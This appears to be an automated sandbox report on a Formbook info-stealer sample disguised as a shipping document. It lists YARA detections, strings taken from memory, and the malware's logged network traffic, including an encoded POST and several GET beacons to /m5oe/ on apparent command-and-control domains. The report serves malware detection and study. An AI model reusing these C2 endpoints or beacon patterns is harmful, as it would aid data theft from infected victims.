5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Nov 2022 00:56:51 GMTContent-Type: text/htmlContent-Length: 2814Connection: closeVary: Accept-EncodingLast-Modified: Fri, 01 Apr 2022 06:50:17 GMTETag: "afe-5db9230fabf0d"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 
4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6
      Source: control.exe, 0000000D.00000002.517236136.0000000005748000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://35.78.89.117
      Source: control.exe, 0000000D.00000002.517236136.0000000005748000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://amh.sh
      Source: control.exe, 0000000D.00000002.517236136.0000000005748000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://amh.sh/
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fontfabrik.com
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: explorer.exe, 00000003.00000000.292294807.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.323770993.000000000F270000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
      Source: PI & PACKING LIST.exe, 00000000.00000002.261208049.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
      Source: PI & PACKING LIST.exe, 00000000.00000002.261208049.0000000000B37000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.como
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
      Source: 71M40-2OQ.13.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
      Source: 71M40-2OQ.13.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
      Source: 71M40-2OQ.13.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
      Source: control.exe, 0000000D.00000003.438741340.000000000118C000.00000004.00000020.00020000.00000000.sdmp, 71M40-2OQ.13.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
      Source: 71M40-2OQ.13.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
      Source: control.exe, 0000000D.00000003.438741340.000000000118C000.00000004.00000020.00020000.00000000.sdmp, 71M40-2OQ.13.dr | String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
      Source: control.exe, 0000000D.00000003.438741340.000000000118C000.00000004.00000020.00020000.00000000.sdmp, 71M40-2OQ.13.dr | String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
      Source: control.exe, 0000000D.00000003.438741340.000000000118C000.00000004.00000020.00020000.00000000.sdmp, 71M40-2OQ.13.dr | String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
      Source: control.exe, 0000000D.00000003.438741340.000000000118C000.00000004.00000020.00020000.00000000.sdmp, 71M40-2OQ.13.dr | String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
      Source: control.exe, 0000000D.00000002.517422506.0000000005BFE000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.bengalindex.com/m5oe/?l48xI=yrQlZi/yeQekXtziTibn9LfL5FHN0Y47PbY
      Source: control.exe, 0000000D.00000003.438741340.000000000118C000.00000004.00000020.00020000.00000000.sdmp, 71M40-2OQ.13.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
      Source: unknown | HTTP traffic detected: POST /m5oe/ HTTP/1.1 | Host: www.cpitherapy.com | Connection: close | Content-Length: 187 | Cache-Control: no-cache | Origin: http://www.cpitherapy.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.cpitherapy.com/m5oe/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Raw: 6c 34 38 78 49 3d 48 66 46 55 75 59 66 47 6f 41 36 38 37 5f 73 34 4d 6c 67 48 78 4f 42 34 6c 5a 30 4e 6d 37 6a 72 4b 34 71 4a 48 45 36 63 78 34 47 33 69 4b 64 52 45 70 44 54 28 78 50 6f 66 61 6c 57 61 75 43 6f 4f 58 48 42 65 69 37 48 45 36 30 67 44 4e 41 6d 31 4e 78 32 58 61 34 63 63 64 77 33 43 64 48 61 77 6f 54 35 43 47 7a 5a 51 78 56 49 38 46 71 5f 34 76 6c 57 6d 62 35 36 6d 71 48 6c 74 70 66 6d 69 58 72 36 56 31 70 6b 4d 41 48 77 4f 70 6f 51 6f 61 63 61 72 33 77 6a 4a 64 4a 56 41 33 32 5a 47 32 67 6b 6f 6f 34 49 4c 69 28 49 37 32 43 45 5a 77 29 2e 00 00 00 00 00 00 00 00 | Data Ascii: l48xI=HfFUuYfGoA687_s4MlgHxOB4lZ0Nm7jrK4qJHE6cx4G3iKdREpDT(xPofalWauCoOXHBei7HE60gDNAm1Nx2Xa4ccdw3CdHawoT5CGzZQxVI8Fq_4vlWmb56mqHltpfmiXr6V1pkMAHwOpoQoacar3wjJdJVA32ZG2gkoo4ILi(I72CEZw).
      Source: unknown | DNS traffic detected: queries for: www.gebouwpas.online
      Source: global traffic | HTTP traffic detected: GET /m5oe/?l48xI=lXL2hA4gPGXGkrsXCHLs63wEyc6+ZxTcosJkE7OIAbbgzBCGQ1RLZhLXXwLUr0PxIclnwkI7OF+QM6Klss4VWWvRg6rabD2uNg==&y8dt=cR-TJP3pr48 HTTP/1.1 | Host: www.zkjk888.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
      Source: global traffic | HTTP traffic detected: GET /m5oe/?l48xI=Kdt0ttn6jBvm5dVCPGsq4sF6gZwVhJORDr+IW0q2lJvFs7kzNd/E4xjIZ8hkWN2nAiXaUCaRapMtLMo79OBUYLpofMwqWu/G3g==&y8dt=cR-TJP3pr48 HTTP/1.1 | Host: www.cpitherapy.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
      Source: global traffic | HTTP traffic detected: GET /m5oe/?l48xI=OgbUJyD2Cs0iavfQBCvIOQvZdrfaRUMlkbnSDVoQDO79KZkwY+JyOZ2XW8xl2hee24/cs1yqqL6PnYlAwwwxD54r6/IzPRoMsg==&y8dt=cR-TJP3pr48 HTTP/1.1 | Host: www.p-soils.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
      Source: global traffic | HTTP traffic detected: GET /m5oe/?l48xI=yrQlZi/yeQekXtziTibn9LfL5FHN0Y47PbY+gegrHfqcLEwJAZ2lhKdA1OTtZbcFcNKVJgIODn1wmw2XGX+PWpMZIoIdVyV5wA==&y8dt=cR-TJP3pr48 HTTP/1.1 | Host: www.bengalindex.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
      Source: global traffic | HTTP traffic detected: GET /m5oe/?l48xI=U9+cid+ik5YJF3jF27GFdJRqVXeG7FP+UvbSj6ZytGipCLvwOYSuUs/u1hqVfurTuH6/pVSyY1dCVh8DyPcg4wzd/AwTcksoYQ==&y8dt=cR-TJP3pr48 HTTP/1.1 | Host: www.nu2uresale.store | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:

      E-Banking Fraud

      Source: Yara match | File source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

      System Summary

      Source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000002.00000002.353618597.0000000000C60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: Process Memory Space: PI & PACKING LIST.exe PID: 2352, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: Process Memory Space: control.exe PID: 5228, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: PI & PACKING LIST.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000002.00000002.353618597.0000000000C60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: Process Memory Space: PI & PACKING LIST.exe PID: 2352, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
